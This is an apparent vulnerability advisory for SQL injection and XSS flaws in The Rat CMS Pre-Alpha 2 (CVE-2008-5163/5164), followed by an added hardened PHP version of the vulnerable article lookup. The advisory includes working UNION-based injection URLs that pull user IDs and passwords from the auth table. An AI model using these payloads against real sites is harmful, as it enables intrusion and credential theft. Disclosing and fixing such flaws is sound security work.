### Key Vulnerability Information

- **Vulnerability description**
  - **Type**: SQL Injection and Cross-Site Scripting (XSS)
  - **Application**: The Rat CMS
  - **Version**: Pre-Alpha 2
- **Vulnerability details**
  - **SQL Injection**
    - **Vulnerable file**: viewarticle.php
    - **Code snippet**:
      ```sql
      SELECT title, content FROM news WHERE id=$_GET['id'];
      ```
    - **Exploitation**:
      - `http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]`
      - `http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]`
    - **PoC**:
      - `http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--`
      - `http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--`
  - **XSS**
    - **Exploitation**:
      - `http://[Target]/[trcms_path]/viewarticle.php/`
      - `http://[Target]/[trcms_path]/viewarticle.php?id=`
      - `http://[Target]/[trcms_path]/viewarticle2.php?id=`
- **Key information**
  - **Disclosure date**: 2008.06.28
  - **Risk level**: High
  - **CVE ID**: CVE-2008-5163 | CVE-2008-5164
  - **CWE ID**: CWE-89 | CWE-79
  - **Source**: CWU Underground Hacking Team
  - **Download**: `http://downloads.sourceforge.net/the-rat-cms`
- **Reference links**
  - http://www.securityfocus.com/bid/29959
  - http://www.securityfocus.com/archive/1/archive/1/493684/100/0/threaded
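
A hardened form of the `viewarticle.php` lookup, as an added example that is not The Rat CMS code or part of the original advisory. The `news`, `title`, `content` and `id` names come from the snippet above; the `render_article` helper, the PDO/SQLite connection and the sample rows are assumptions constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: returns article HTML, or null when the id is invalid or unknown.
function render_article(PDO $db, mixed $rawId): ?string
{
    // 1. Accept only a plain positive integer; arrays and strings carrying SQL are rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bound parameter: the request value never becomes part of the SQL text (CWE-89).
    $stmt = $db->prepare('SELECT title, content FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }

    // 3. Encode on output so markup in the data is rendered as text (CWE-79).
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h1>' . $esc($row['title']) . '</h1><div>' . $esc($row['content']) . '</div>';
}

// Constructed demo data in an in-memory SQLite database (assumption for this example only).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT)');
$db->exec("INSERT INTO news (id, title, content) VALUES (1, 'Hello <b>world</b>', 'First post')");

// Constructed inputs: a valid id, a UNION-style string, an array parameter, an unknown id.
foreach (['1', '-9999/**/UNION/**/SELECT/**/1,2--', ['x'], '2'] as $input) {
    $html = render_article($db, $input);
    echo json_encode($input, JSON_UNESCAPED_SLASHES), ' => ', $html ?? '404 Not Found', PHP_EOL;
}
```

Only the first input returns HTML, with the `<b>` in the stored title emitted as `&lt;b&gt;`; the other three fall through to the not-found path without reaching the query or without matching a row.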